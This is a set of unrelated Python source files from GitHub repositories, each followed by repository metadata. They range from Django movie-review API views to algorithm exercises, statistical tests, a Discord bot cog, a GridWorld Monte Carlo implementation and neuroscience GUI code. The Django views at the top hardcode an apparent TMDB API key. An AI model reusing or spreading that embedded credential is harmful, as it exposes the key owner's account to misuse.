MovieListSerializer,
MovieSerializer,
CommentListSerializer,
CommentSerializer,
GenreSerializer,
)
from movies import serializers
# Create your views here.
MYKEY = 'fb9a96092cd1259e59917287f35839c8'
def getGenre(request):
genreURL = f'https://api.themoviedb.org/3/genre/movie/list?api_key={MYKEY}&language=ko-KR'
allGenre = requests.get(genreURL)
datas = allGenre.json().get('genres')
for data in datas:
Genre.objects.get_or_create(
id = data.get('id'),
name = data.get('name'),
)
return
def getMovie(request):
# n을 변수로삼고 for문을 돌려서 충분한 양의 영화정보를 DB에 저장할 수 있도록 한다.
for n in range(1, 20):
movieURL = f'https://api.themoviedb.org/3/discover/movie?api_key={MYKEY}&language=ko-KR&page={str(n)}'
# 스타트캠프 미세먼지 API 참조하며 가져오기,,
allMovie = requests.get(movieURL)
# get 'results' 찾는데 시간이 좀 걸렸음
datas = allMovie.json().get('results')
for data in datas:
Movie.objects.get_or_create(
# 원하는 친구들을 뽑아서 원하는 필드에 넣고
movie_id = data.get('id'),
title = data.get('original_title'),
overview = data.get('overview'),
release_date = data.get('release_date'),
voteavg = data.get('vote_average'),
# poster_path + 하는 부분도 검색해서 알게됨
poster_path = "https://image.tmdb.org/t/p/original"+ data.get('poster_path'),
)
# movie와 genre의 id끼리 M:N 모델을 수립하는 과정
# genre별 movie를 꺼내와야 하기 때문에 필요한 과정이다.
# 해당 영화의 genre 저장해주고
genreItems = data.get('genre_ids')
# 지금 for문 내에 잡혀있는 movie_id의 정보들 가져온다음
movie = Movie.objects.get(movie_id = data.get('id'))
# 하나의 영화에 장르ID가 여러개 있기 때문에 for문을 돌려가며 추가해줘야한다
for i in genreItems:
p1 = get_object_or_404(Genre, pk=i)
# M:N 필드에 추가
movie.genres.add(p1)
return
# 장르별로 무비 가져오기
@api_view(['GET'])
def movie_genre(request, genre_id):
movie_genres = Movie.objects.filter(genres=genre_id)
serializer = MovieListSerializer(movie_genres, many=True)
return Response(data=serializer.data)
# 모든 장르 가져오기
@api_view(['GET'])
def all_movie_genre(request):
genres = Genre.objects.all()
serializer = GenreSerializer(genres, many=True)
return Response(data=serializer.data)
@api_view(['GET']) # GET 요청이 올 때
def movie_list(request):
movies = Movie.objects.all()
# Movie 모델에 전체 데이터를 가져오고
serializer = MovieListSerializer(movies, many=True)
# 시리얼라이즈화 해서 serializer 변수에 저장! 디폴트값이 여러개 데이터는 못가져오니 many=True 꼭 넣어줘야함!
return Response(data=serializer.data)
# Response의 data키워드 인자에 serilaizer.data를 저장해서 보여주기
@api_view(['GET'])
def movie_detail(request, movie_id): # movie_id도 가져와서
movie = Movie.objects.get(pk=movie_id)
# movie_id와 같은 pk값을 가진 친구만 movie에 저장하고
serializer = MovieSerializer(movie)
# 똑같이 진행하는데 데이터는 1개일테니 many=True 필요없음!
return Response(data=serializer.data)
# 영화별로 댓글 불러오기
@api_view(['GET', 'POST'])
def comment_list(request, movie_id):
movie = get_object_or_404(Movie, pk=movie_id)
# 개별 movie 가져오고
if request.method == 'GET':
# 만약 GET 요청이면 ( 단순 조회면 )
comment = Comment.objects.filter(comment_movie=movie)
# review 중에 movie가 movie인 친구를 선별하여
serializer = CommentListSerializer(comment, many=True)
# 똑같이 serializer화 하여서
return Response(data=serializer.data)
# 보여주기
elif request.method == 'POST':
# 만약 POST 요청이면 ( 생성하는거면 )
serializer = CommentListSerializer(data=request.data)
# 방금 생성해서 보낸 데이터를 ReviewListSerializer에 담은 후 저장
if serializer.is_valid(raise_exception=True):
# 유효성 검사 // raise_exception을 통해 잘못된 요청이 들어왔을 때 자동으로 적절한 응답 보내기
serializer.save(comment_movie=movie)
# 해당 movie에 저장
return Response(data=serializer.data, status=status.HTTP_201_CREATED)
# 저장하고 잘 저장됐다는 의미에서 201 보내주기
# user별로 댓글 불러오기
@api_view(['GET'])
def comment_list_by_user(request, user_id):
comment = Comment.objects.filter(comment_user=user_id)
# review 중에 movie가 movie인 친구를 선별하여
serializer = CommentListSerializer(comment, many=True)
# 똑같이 serializer화 하여서
return Response(data=serializer.data)
# 보여주기
@api_view(['GET', 'PUT', 'DELETE'])
def comment_detail(request, movie_id, comment_id):
movie = get_object_or_404(Movie, pk=movie_id)
# 개별 무비를 가져오고
comment = get_object_or_404(Comment, pk=comment_id, comment_movie=movie)
# 그 무비에 해당하는 리뷰를 가져온다음
if request.method == 'GET':
# 요청이 GET이면
serializer = CommentSerializer(comment)
# serializer화 하여서
return Response(data=serializer.data)
# 보여주기
elif request.method == 'PUT':
# 요청이 PUT이면
serializer = CommentSerializer(comment, data=request.data, partial=True)
# data를 현재 요청되는 data로 바꾼 후 저장
# partial=True -> 전체를 바꾸지 않고 필드 중에 하나만 바꿔도 수정이 되도록
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(data=serializer.data)
elif request.method == 'DELETE':
# 요청이 'DELETE'이면
comment.delete()
# 삭제하고
data = {
'message': '성공적으로 삭제되었습니다!'
}
# message 띄워주기
return Response(data=data, status=status.HTTP_204_NO_CONTENT)
# HTTP도 No content를 이용한 204로
| jhs9497/MovieRecommendSite | backend/movies/views.py | views.py | py | 6,928 | python | ko | code | 0 | github-code | 36 |
26976730431 | class Stacke:
def __init__(self,size) -> None:
self.top = -1
self.arr = [0]*size
self.size = size
def push(self,data):
print(self.top)
if(self.top < self.size -1 ):
self.top +=1
self.arr[self.top] = data
else:
print("Stack overflow at",data)
def pop(self):
if(self.top >= 0):
data = self.arr[self.top]
self.arr[self.top] =0
self.top -=1
return data
else:
return "Stack empty"
def peak(self):
if(self.top >= 0):
return self.arr[self.top]
else:
return "Stack empty"
if __name__ == '__main__':
sta = Stacke(4)
sta.push(5)
sta.push(4)
sta.push(1)
sta.push(0)
sta.push(44)
print(sta.peak())
sta.pop()
print(sta.peak())
sta.push(23)
print(sta.peak())
| Manoj-895/DSA-Python | Stack/Stack.py | Stack.py | py | 916 | python | en | code | 0 | github-code | 36 |
26211280111 | import sys
sys.stdin = open('input.txt')
T = 10
# 결과
#1 67 ...
for _ in range(1, T+1):
tc = int(input()) # 사다리번호
ladder = [list(map(int, input().split())) for _ in range(100)]
for i in range(100):
# 도착지를 찾는 코드
if ladder[99][i] == 2:
x = i
y = 99
# y == 0 되는 시점 = > 제일 윗줄 도착, while문 종료
while y > 0:
# 현재 위치 기준, 좌/우를 체크 (x는 가로축 , y는 세로축)
# 예외처리 분기문
# 제일 오른쪽과 제일 왼쪽이 아니라면 > 좌우를 살펴보세요
if x != 99 and x != 0:
# 왼쪽 길이 있는 경우
if ladder[y][x-1] == 1:
ladder[y][x] = 0 # 내가 있던자리 0으로 설정
x -= 1 # 왼쪽으로 이동
continue
# 오른쪽 길이 있는 경우
if ladder[y][x+1] == 1:
ladder[y][x] = 0 # 내가 있던자리 0으로 설정
x += 1 # 오른쪽으로 이동
continue
# 제일 오른쪽이라면 > 왼쪽만 살펴보세요
elif x == 99:
# 왼쪽 길이 있는 경우
if ladder[y][x-1] == 1:
ladder[y][x] = 0 # 내가 있던자리 0으로 설정
x -= 1 # 왼쪽으로 이동
continue
# 제일 왼쪽이라면 > 오른쪽만 살펴보세요
elif x == 0:
# 오른쪽 길이 있는 경우
if ladder[y][x+1] == 1:
ladder[y][x] = 0 # 내가 있던자리 0으로
x += 1 # 오른쪽으로 이동
continue
# 왼쪽도 오른쪽도 길이 없는 경우
ladder[y][x] = 0 # 내가 있던자리 0으로
y -= 1 # 올라감
result = x
print(result) | hong00009/algo | swea/1210_ladder/sol1.py | sol1.py | py | 1,895 | python | ko | code | 0 | github-code | 36 |
712417785 | from unittest import TestCase
from . import TreeNode
from .search_in_a_binary_tree import SearchInABinaryTree
class SearchInABinaryTreeTest(TestCase):
def test_existing_inputs(self):
solution = SearchInABinaryTree()
subtree: TreeNode = TreeNode(2, left=TreeNode(1), right=TreeNode(3))
self.assertEqual(
subtree,
solution.searchBST(
TreeNode(
4,
left=subtree,
right=TreeNode(7),
),
2,
),
)
def test_notfound_input(self):
solution = SearchInABinaryTree()
self.assertEqual(
[],
solution.searchBST(
TreeNode(
4,
left=TreeNode(2, left=TreeNode(1), right=TreeNode(3)),
right=TreeNode(7),
),
5,
),
)
| roma-glushko/leetcode-solutions | src/tree/search_in_a_binary_tree_test.py | search_in_a_binary_tree_test.py | py | 952 | python | en | code | 3 | github-code | 36 |
2769538888 | import discord.ext.commands as disextc
import logging as lg
import yaml as yl
log = lg.getLogger(__name__)
class Config(disextc.Cog):
""" Configuration handler for the bot.
This is a yml file representation. Each configuration stored should be
under its own key:
discord:
exampledata1
exampledata2
reddit:
exampledata
Between the database and env vars for credentials, this should only be
used for things that would be beneficial to change at runtime.
This file should most optimally be 'read' before used, and 'saved' after
being altered. The defaults should be stored in each cog that utilizes
them.
Anything that is 'memory' should be stored in persistent memory cog.
Attributes:
-------------------------------------------
bot -> The bot that was initialized with the cog.
data -> a dictionary representation of the config file
"""
def __init__(self, bot: disextc.Bot):
super().__init__()
self.bot = bot
self.data = {}
# Listeners
@disextc.Cog.listener()
async def on_ready(self):
""" Initialize the config cog. """
# TODO: Change the config load into a retry-system.
# NOTE: This needs to be done immediately to ensure that other cogs
# won't have to wait long on it.
await self.load_config()
await self.bot.wait_until_ready()
txt_config_on_ready = "on_ready config cog fired."
log.debug(txt_config_on_ready)
# Helpers
async def load_config(self):
""" Loads config from Redis."""
# TODO: Error handling?
memory = self.bot.get_cog('Memory')
if memory is None:
raise RuntimeError('Could not get memory cog to save config.')
from cogs.memory import redis_db_config
pool = await memory.get_redis_pool(redis_db_config)
self.data = yl.safe_load(await pool.get('config'))
pool.close()
await pool.wait_closed()
log.info(f'Config Loaded')
async def save_config(self):
""" Saves config to Redis."""
# TODO: Error handling?
memory = self.bot.get_cog('Memory')
if memory is None:
raise RuntimeError('Could not get memory cog to save config.')
from cogs.memory import redis_db_config
pool = await memory.get_redis_pool(redis_db_config)
result = await pool.set('config', yl.safe_dump(self.data))
pool.close()
await pool.wait_closed()
log.debug(f'Save config results: {result}')
# Config Command Group
@disextc.group(name='con', hidden=True)
@disextc.is_owner()
async def config_group(self, ctx: disextc.Context):
"""Group for config cog commands."""
# TODO: more Gracefully
if ctx.invoked_subcommand is None:
await ctx.send('No config subcommand given.')
@config_group.command(name='show', hidden=True)
@disextc.is_owner()
async def show_config_command(self, ctx: disextc.Context):
"""Dumps current config into ctx. """
await ctx.send('```' + repr(self.data) + '```')
def setup(bot: disextc.Bot) -> None:
""" Loads config cog. """
bot.add_cog(Config(bot))
| guitaristtom/pythonbot-core | bot/cogs/config.py | config.py | py | 3,262 | python | en | code | 0 | github-code | 36 |
35970793791 | import numpy as np
from st_ops import st_ops
class PG(object):
def __init__(self, lam, A, lr):
self.lam = lam
if lr is None:
self.lr = 1.01 * np.max(np.linalg.eig(2 * A)[0])
else:
self.lr = lr
def update(self, grad, params):
next_params = params - 1/self.lr * grad
params = st_ops(next_params, self.lam * 1 / self.lr)
return params
| sff1019/ARTT458_midterm | problem_7/optimizers/pg.py | pg.py | py | 418 | python | en | code | 0 | github-code | 36 |
71311470503 | import numpy as np
from sklearn.utils.validation import check_array, check_scalar
from scipy import stats
def z_test_one_sample(sample_data, mu_0, sigma, test_type="two-sided"):
"""Perform a one-sample z-test.
Parameters
----------
sample_data : array-like of shape (n_samples,)
Sample data drawn from a population.
mu_0 : float or int
Population mean assumed by the null hypothesis.
sigma: float
True population standard deviation.
test_type : {'right-tail', 'left-tail', 'two-sided'}
Specifies the type of test for computing the p-value.
left-tail: Intergral links bis pvalue
right-tail: 1 - Integral links bis pvalue
two-sided: min etc.
Returns
-------
z_statistic : float
Observed z-transformed test statistic.
p : float
p-value for the observed sample data.
"""
# Check parameters.
sample_data = check_array(sample_data, ensure_2d=False)
mu_0 = check_scalar(mu_0, name="mu_0", target_type=(int, float))
sigma = check_scalar(sigma, name="sigma", target_type=(int, float), min_val=0, include_boundaries="neither")
if test_type not in ["two-sided", "left-tail", "right-tail"]:
raise ValueError("`test_type` must be in `['two-sided', 'left-tail', 'right-tail']`")
# empirical mean
empirical_mean = np.mean(sample_data)
# sample size
sample_size = len(sample_data)
# z_statistic
# kommen empirical means aus gleichen Distributions?
z_statistic = (empirical_mean - mu_0) / (sigma / np.sqrt(sample_size))
# p-value
# depends on test_type
p_left = stats.norm.cdf(z_statistic)
p_right = 1 - p_left
if test_type == "left-tail":
p = p_left
elif test_type == "right-tail":
p = p_right
else:
p = 2 * min(p_left, p_right)
return z_statistic, p
def t_test_one_sample(sample_data, mu_0, test_type="two-sided"):
"""Perform a one-sample t-test.
Parameters
----------
sample_data : array-like of shape (n_samples,)
Sample data drawn from a population.
mu_0 : float or int
Population mean assumed by the null hypothesis.
test_type : {'right-tail', 'left-tail', 'two-sided'}
Specifies the type of test for computing the p-value.
Returns
-------
t_statistic : float
Observed t-transformed test statistic.
p : float
p-value for the observed sample data.
Variance is estimated from the sample data (not given like in z-test).
"""
# Check parameters.
sample_data = check_array(sample_data, ensure_2d=False)
mu_0 = check_scalar(mu_0, name="mu_0", target_type=(int, float))
if test_type not in ["two-sided", "left-tail", "right-tail"]:
raise ValueError("`test_type` must be in `['two-sided', 'left-tail', 'right-tail']`")
# empirical mean is test statistic
empirical_mean = np.mean(sample_data)
# empirical standard deviation
# ddof=1: Delta degrees of freedom. The divisor used in calculations is N - ddof, where N represents the number of elements.-> N-1 = ddof
empirical_sigma = np.std(sample_data, ddof=1)
# sample size
sample_size = len(sample_data)
# t_statistic
# kommen empirical means aus gleichen Distributions?
# sigma is not given, has to be estimated from sample data
# degrees of freedom = sample_size - 1; Letzter Datenpunkt ist aus N-1 anderen und mean berechenbar
t_statistic = (empirical_mean - mu_0) / (empirical_sigma / np.sqrt(sample_size))
# p-value
# depends on test_type
p_left = stats.t.cdf(t_statistic, df=sample_size - 1) # df = degrees of freedom
p_right = 1 - p_left
if test_type == "left-tail":
p = p_left
elif test_type == "right-tail":
p = p_right
else:
p = 2 * min(p_left, p_right)
return t_statistic, p
| KlaraGtknst/e2ml_SoSe23 | e2ml/e2ml/evaluation/_one_sample_tests.py | _one_sample_tests.py | py | 3,888 | python | en | code | 0 | github-code | 36 |
73583264105 | import phunspell
import inspect
import unittest
class TestPtBR(unittest.TestCase):
pspell = phunspell.Phunspell('pt_BR')
def test_word_found(self):
self.assertTrue(self.pspell.lookup("ecocardiografável"))
def test_word_not_found(self):
self.assertFalse(self.pspell.lookup("phunspell"))
def test_lookup_list_return_not_found(self):
words = "sabrosino anuente ecocardiografável oláceo veneciano borken"
self.assertListEqual(
self.pspell.lookup_list(words.split(" ")), ["borken"]
)
if __name__ == "__main__":
unittest.main()
| dvwright/phunspell | phunspell/tests/test__pt_BR.py | test__pt_BR.py | py | 604 | python | en | code | 4 | github-code | 36 |
73577359145 | import numpy as np
from src.do_not_touch.result_structures import PolicyAndActionValueFunction
from src.env.GridWorld import GridWorld
class GridWorldMonteCarlo(GridWorld):
def __init__(self, size: int = 5):
super().__init__(size)
def monte_carlo_es(self, num_episodes=1000) -> PolicyAndActionValueFunction:
pi = {state: {action: 1 / len(self.actions) for action in self.actions} for state in self.states}
q = {state: {action: 0 for action in self.actions} for state in self.states}
returns = {state: {action: [] for action in self.actions} for state in self.states}
for _ in range(num_episodes):
state = tuple(np.random.choice(range(5), size=2))
action = np.random.choice(self.actions)
episode = []
while state not in [(0, 4), (4, 4)]:
reward = self.transition_probability(state, action, state, 1)
episode.append((state, action, reward))
state = tuple(np.random.choice(range(5), size=2))
action = np.random.choice(self.actions)
g = 0
for state, action, reward in reversed(episode):
g = reward + g
if (state, action) not in [(x[0], x[1]) for x in episode[::-1]]:
returns[state][action].append(g)
q[state][action] = np.mean(returns[state][action])
best_action = max(q[state], key=q[state].get)
for a in pi[state].keys():
pi[state][a] = 1 if a == best_action else 0
return PolicyAndActionValueFunction(pi, q)
def on_policy_first_visit_monte_carlo_control(self) -> PolicyAndActionValueFunction:
pass
def off_policy_monte_carlo_control(self) -> PolicyAndActionValueFunction:
pass
def execute(self):
print(f"Environment \033[1m{self.__class__.__name__}\033[0m")
print("\n")
print("\t \033[1mMonte Carlo ES\033[0m")
print("\t", self.monte_carlo_es())
print("\n")
print("\t \033[1mOn Policy First Visit Monte Carlo Control\033[0m")
print("\t", self.on_policy_first_visit_monte_carlo_control())
print("\n")
print("\t \033[1mOff Policy Monte Carlo Control\033[0m")
print("\t", self.off_policy_monte_carlo_control())
print("\n")
| divinoPV/deep_reinforcement_learning_on_several_envs | src/Algorithm/MonteCarlo/GridWorld.py | GridWorld.py | py | 2,445 | python | en | code | 0 | github-code | 36 |
34752581629 | test_input = '''R 4
U 4
L 3
D 1
R 4
D 1
L 5
R 2
'''
test_input2 = '''R 5
U 8
L 8
D 3
R 17
D 10
L 25
U 20
'''
from math import copysign
puzzle_input = open(__file__.replace('.py', '_input.txt')).read()
class State:
def __init__(self, knots=2):
self.visited_locations = set()
self.knots = [[0, 0]] * knots
def distance_from_neighbor(self, knot):
currentKnot = self.knots[knot]
neighbor = self.knots[knot-1]
return tuple(map(lambda x, y: x - y, neighbor, currentKnot))
def move_head(self, offset):
self.knots[0] = list(map(lambda x, y: x + y, self.knots[0], offset))
def move_knot(self, knot):
currentKnot = self.knots[knot]
offset = [0, 0]
x_distance, y_distance = self.distance_from_neighbor(knot)
previousKnot = self.knots[knot-1]
if abs(x_distance) > 1:
offset[0] = int(1 * copysign(1, x_distance))
if abs(y_distance) > 0:
offset[1] = int(1 * copysign(1, y_distance))
if abs(y_distance) > 1:
offset[1] = int(1 * copysign(1, y_distance))
if abs(x_distance) > 0:
offset[0] = int(1 * copysign(1, x_distance))
self.knots[knot] = list(map(lambda x, y: x + y, currentKnot, offset))
if knot == len(self.knots) - 1:
self.visited_locations.add(tuple(self.knots[knot]))
def parse_input(self, input_):
self.moves = []
for l in input_.splitlines():
dir, distance = l.split(' ')
for i in range(int(distance)):
if dir == 'R':
self.moves.append([1, 0])
elif dir == 'L':
self.moves.append([-1, 0])
elif dir == 'U':
self.moves.append([0, 1])
else:
self.moves.append([0, -1])
def solve(self, input_):
self.parse_input(input_)
for move in self.moves:
self.move_head(move)
for i in range(1, len(self.knots)):
self.move_knot(i)
return len(sorted(self.visited_locations))
test1 = State(2)
assert test1.solve(test_input) == 13
test2 = State(10)
assert test2.solve(test_input) == 1
test3 = State(10)
assert test3.solve(test_input2) == 36
x = State(2)
print(f'Part One: {x.solve(puzzle_input)}')
x = State(10)
print(f'Part Two: {x.solve(puzzle_input)}')
| techartorg/Advent_of_Code_2022 | rob_kovach/day_09.py | day_09.py | py | 2,456 | python | en | code | 4 | github-code | 36 |
7282602903 | ################################################################################
# 1. Including files
################################################################################
import xlrd
################################################################################
# 2. Class definition
################################################################################
class testSuiteCollection:
test_suite_name = ""
testcases = []
def __init__(self, test_suite_name):
self.test_suite_name = str(test_suite_name)
class testcaseCollection:
function_name = ""
testcase_name = ""
invoked_func_precondition = ""
params = []
global_vars = []
def __init__(self, function_name, testcase_name):
self.function_name = str(function_name)
self.testcase_name = str(testcase_name)
class globalVarCollection:
gen_name = ""
type = ""
expected = ""
actual_mem = ""
mask = ""
def __init__(self, gen_name, type, expected, actual_mem, mask):
self.gen_name = str(gen_name)
self.type = str(type)
self.expected = str(expected)
self.actual_mem = str(actual_mem)
self.mask = str(mask)
class paramCollection:
gen_name = ""
type = ""
param_name = ""
init_value = ""
isStructType = "False"
def __init__(self, gen_name, type, param_name, init_value, isStructType):
self.gen_name = str(gen_name)
self.type = str(type)
self.param_name = str(param_name)
self.init_value = str(init_value)
self.isStructType = str(isStructType)
################################################################################
# 3. Function definition
################################################################################
def find_output_position(firstParamColumn):
output_position = firstParamColumn # assume that there is no INPUT data,
# and OUTPUT data begins at first param column.
for i in range(sheet.ncols):
if "Output" == sheet.cell_value(2, i):
output_position = i
return output_position
def isStructure(type):
result = "True"
# check if "type" exists in "basicTypes"
try:
type.index("Struct_")
except ValueError:
result = "False"
return result
################################################################################
# 4. Main processing: XLS file parsing
################################################################################
loc = ("C:\\Users\\PC\\Documents\\GitHub\\STM32F4Discovery\\UT_TestSuite.xls")
# Open Workbook
testcaseSheetList = [6, 8, 9, 10]
firstParamColumn = 3
tcFirstLine = 5
tcNameColumn = 0
tcInvokedFuncColumn = 1
ioTypeRow = 4
ioNameRow = 3
testSuite = testSuiteCollection("ut_usart_driver")
# Open XLS file
wb = xlrd.open_workbook(loc)
for tcSheet in testcaseSheetList:
# Open a sheet
sheet = wb.sheet_by_index(tcSheet)
noRows = sheet.nrows
noCols = sheet.ncols
func_name = sheet.cell_value(0, 1)
output_position = find_output_position(firstParamColumn)
for i in range(tcFirstLine, noRows):
testcase_name = sheet.cell_value(i, tcNameColumn)
testcase_invoked_func = sheet.cell_value(i, tcInvokedFuncColumn)
noParams = (output_position - firstParamColumn) // 2 # division with result of integer number
noGlobalVars = (noCols - output_position) // 2 # division with result of integer number
testcase = testcaseCollection(func_name, testcase_name)
testcase.invoked_func_precondition = testcase_invoked_func
testcase.params = [None]*noParams
testcase.global_vars = [None]*noGlobalVars
# Collect all parameters
index = 0
for j in range(firstParamColumn, output_position, 2):
gen_name = "param_" + str(index + 1)
type = sheet.cell_value(ioTypeRow, j) # unchanged
param_name = sheet.cell_value(ioNameRow, j) # unchanged
init_value = sheet.cell_value(i, j)
isStructType = isStructure(type)
testcase.params[index] = \
paramCollection(gen_name, type, param_name, init_value, isStructType)
index += 1
# Collect all global variables
index = 0
for j in range(output_position, noCols - 1, 2):
gen_name = "global_var_" + str(index + 1)
type = sheet.cell_value(ioTypeRow, j) # unchanged
expected = sheet.cell_value(i, j)
actual_mem = sheet.cell_value(ioNameRow, j) # unchanged
mask = sheet.cell_value(i, j + 1)
testcase.global_vars[index] = \
globalVarCollection(gen_name, type, expected, actual_mem, mask)
index += 1
testSuite.testcases.append(testcase)
| duattn1/STM32F4Discovery_Unit_Testing | Script/UnitTestScript/XlsProcessing.py | XlsProcessing.py | py | 4,938 | python | en | code | 0 | github-code | 36 |
15119831760 | import requests
def get_page(name):
url = "https://fr.wikipedia.org/w/api.php?"
try:
response = requests.get(
url,
params={
"action": "query",
"list": "search",
"srsearch": name,
"format": "json",
},
headers={
"Content-Type": "application/json",
}
)
response.raise_for_status()
return response.json()
except requests.exceptions.RequestException as error:
print(error)
def get_page_content(pageid):
url = "https://fr.wikipedia.org/w/api.php?"
try:
response = requests.get(
url,
params={
"action": "parse",
"pageid": pageid,
"format": "json",
},
headers={
"Content-Type": "application/json",
}
)
response.raise_for_status()
return response.json()
except requests.exceptions.RequestException as error:
print(error)
from bs4 import BeautifulSoup
def get_information(name):
try:
result = get_page(name)
content = get_page_content(result['query']['search'][0]['pageid'])
html = content['parse']['text']['*']
dom = BeautifulSoup(html, "html.parser")
th = dom.find_all('th')
information = {}
for i in range(len(th)):
if th[i].text == "Siège":
information["address"] = th[i].find_next_sibling('td').text.replace('\n', '').strip()
if th[i].text == "SIREN":
information["siren"] = th[i].find_next_sibling('td').text.replace('\n', '').strip()
if th[i].text == "Site web" or th[i].text == "Sites web":
link = th[i].find_next_sibling('td').find('a')
if link:
information["website"] = link.get('href')
return information
except Exception as error:
print(error)
return None
| PjuchNicz/Projet-ISKR | python/enrichment/wikipedia.py | wikipedia.py | py | 2,040 | python | en | code | 0 | github-code | 36 |
42154318378 | # 색종이 만들기
import sys
input = sys.stdin.readline
case = int(input())
maps = [list(map(int, input().split())) for _ in range(case)]
white = 0
blue = 0
def dq(maps, x, y, l): # x y l
global white, blue
tmp = maps[x][y]
for i in range(x, x+l):
for j in range(y, y+l):
if maps[i][j] != tmp:
dq(maps, x, y, l // 2)
dq(maps, x + l // 2, y, l // 2)
dq(maps, x, y + l // 2, l // 2)
dq(maps, x + l // 2, y + l // 2, l // 2)
return
if not tmp:
blue += 1
else:
white += 1
dq(maps, 0, 0, case)
print(blue)
print(white)
| FeelingXD/algorithm | beakjoon/2630.py | 2630.py | py | 662 | python | en | code | 2 | github-code | 36 |
39054330190 | from brainrender.Utils.camera import set_camera
import brainrender
from brainrender.Utils.camera import set_camera_params
from brainrender_gui import App
from brainrender_gui.widgets.actors_list import update_actors_list
from brainrender_gui_mod.scene_mod import SceneMod, MyInteractorStyle
from brainrender_gui_mod.widgets.credits import CreditsWindow
from brainrender_gui_mod.ui_mod import UIMod
from brainrender_gui_mod.apputils.regions_control_mod import RegionsControlMod
from brainrender_gui_mod.apputils.actors_control_mod import ActorsControlMod
class AppMod(
App, SceneMod, UIMod, RegionsControlMod, ActorsControlMod,
):
store = {}
fixed_sagittal_camera = dict(
position=[3998.434612221822, 3745.8134440474814, 48593.38552676014],
focal=[6587.835, 3849.085, 5688.164],
viewup=[0.009118000372890485, -0.9999526965279836, -0.003386262779896527],
distance=42972.44034956067,
clipping=[36210.473627528314, 58330.894218958376],
)
def __init__(self, *args, **kwargs):
super(AppMod, self).__init__(atlas='allen_mouse_10um', **kwargs)
# Initialize parent classes
SceneMod.__init__(self)
UIMod.__init__(self, **kwargs)
RegionsControlMod.__init__(self)
ActorsControlMod.__init__(self)
# FIXED: if there are any actors at all in the list, select the first one
# This fixes the error that occurs if the user clicks the properties before an actor is selected
if self.actors_list.count() > 0:
self.actors_list.setCurrentRow(0)
self.actor_list_clicked(0)
# MODIFIED: set the root alpha in the beginning to 0.5 and write that to the textbox
self.scene.root.alpha(0.5)
self.alpha_textbox.setText('0.5')
# ADDED: Connect the new buttons to their functions
self.buttons['new_show_structures_tree'].clicked.connect(self.toggle_treeview)
self.buttons['show_actor_menu'].clicked.connect(self.toggle_actor_menu)
self.buttons['switch_reference_point'].clicked.connect(self.toggle_reference_point)
self.injection_slider.valueChanged.connect(self.update_injection_volume)
self.update_plotter()
# ADDED: Method to toggle the actor menu (right bar)
def toggle_actor_menu(self):
if not self.actor_menu.isHidden():
self.buttons["show_actor_menu"].setText(
"Show actor menu"
)
else:
self.buttons["show_actor_menu"].setText(
"Hide actor menu"
)
self.actor_menu.setHidden(not self.actor_menu.isHidden())
# ADDED: Method to switch the reference point for the clipping
def toggle_reference_point(self):
if self.buttons["switch_reference_point"].text() == 'Brain':
self.buttons["switch_reference_point"].setText(
'Pipette tip'
)
self.current_reference_point = 'pipette_tip'
self.scene.plotter.camera.SetFocalPoint(self.get_reference_point())
else:
self.buttons["switch_reference_point"].setText(
'Brain'
)
self.current_reference_point = 'root'
self.scene.plotter.camera.SetFocalPoint(self.get_reference_point())
self.update_clippers(force_update=True)
# Fake a button press to force canvas update
self.scene.plotter.interactor.MiddleButtonPressEvent()
self.scene.plotter.interactor.MiddleButtonReleaseEvent()
# ADDED: Method to update the simulated injected volume
def update_injection_volume(self, value):
self.injection_label.setText(f'Injection volume: {value : 3} nl')
ink_radius = value * 2
self.pipette_dict['ink_blob_source'].SetRadius(ink_radius)
self.pipette_dict['ink_blob_source'].Update()
# Fake a button press to force canvas update
self.scene.plotter.interactor.MiddleButtonPressEvent()
self.scene.plotter.interactor.MiddleButtonReleaseEvent()
def update_plotter(self):
self.scene.plotter.camera.AddObserver('ModifiedEvent', self.CameraModifiedCallback)
self.scene.plotter.interactor.SetInteractorStyle(MyInteractorStyle(self))
def _update(self):
"""
Updates the scene's Plotter to add/remove
meshes
"""
self.scene.apply_render_style()
if self.camera_orientation is not None:
if self.camera_orientation != "sagittal":
set_camera(self.scene, self.camera_orientation)
else:
set_camera_params(self.scene.plotter.camera, self.fixed_sagittal_camera)
self.camera_orientation = None
self.scene.plotter.camera.SetFocalPoint(self.get_reference_point())
# Get actors to render
self._update_actors()
# REMOVED: the actors will not be reloaded every single update
# instead we check which ones were added/removed below
'''
to_render = [act for act in self.actors.values() if act.is_visible]
# Set actors look
meshes = [act.mesh.c(act.color).alpha(act.alpha) for act in to_render]
# Add axes
if self.axes is not None:
meshes.append(self.axes)
# update actors rendered
self.scene.plotter.show(
*meshes, interactorStyle=0, bg=brainrender.BACKGROUND_COLOR,
)
'''
# ADDED: a quick check whether the plotter was initialized before
if not self.scene.plotter.initializedPlotter:
self.scene.plotter.show(interactorStyle=0, bg=brainrender.BACKGROUND_COLOR,)
# ADDED: make lists of which actors are to render and which ones are already in the scene, to prevent
# unnecessary updates
to_show = {key: values for key, values in self.actors.items() if values.is_visible}
already_rendered = [key for key in self.store.keys()]
# Render only the new actors
for actor in already_rendered:
if actor in to_show:
self.store[actor]['ClippedMesh'].c(self.actors[actor].color)
self.store[actor]['ClippedMesh'].alpha(self.actors[actor].alpha)
self.store[actor]['Cap'].c(self.actors[actor].color)
self.store[actor]['Cap'].alpha(self.actors[actor].alpha)
else:
self.store[actor]['ClippedMesh'].alpha(0)
self.store[actor]['Cap'].alpha(0)
# Fake a button press to force canvas update
self.scene.plotter.interactor.MiddleButtonPressEvent()
self.scene.plotter.interactor.MiddleButtonReleaseEvent()
# Update list widget
update_actors_list(self.actors_list, self.actors)
def open_credits_dialog(self):
self.credits_dialog = CreditsWindow(self, self.palette)
| Marti-Ritter/Portfolio | Injection Interface (Python)/app_mod.py | app_mod.py | py | 6,864 | python | en | code | 0 | github-code | 36 |
8625978148 | import os
import torch
def load_checkpoint(path):
if os.path.isdir(path):
path = os.path.join(path, 'checkpoint_best.pt')
dst = f'cuda:{torch.cuda.current_device()}'
print(f'Loading checkpoint from {path}')
checkpoint = torch.load(path, map_location=dst)
return checkpoint
ckpt = load_checkpoint("./LM-TFM/")
# # adaptive softmax / embedding
cutoffs, tie_projs = [], [False]
cutoffs = [19997, 39997, 199997]
tie_projs += [True] * len(cutoffs)
model_config_base = {
'dropout' : 0.1,
'dropatt' : 0.0,
'tie_weight' : False,
'div_val' : 1,
'pre_lnorm' : True,
'cutoffs' : cutoffs,
'clamp_len' : 400,
}
from transformers import TransfoXLTokenizer, TransfoXLLMHeadModel, TransfoXLConfig
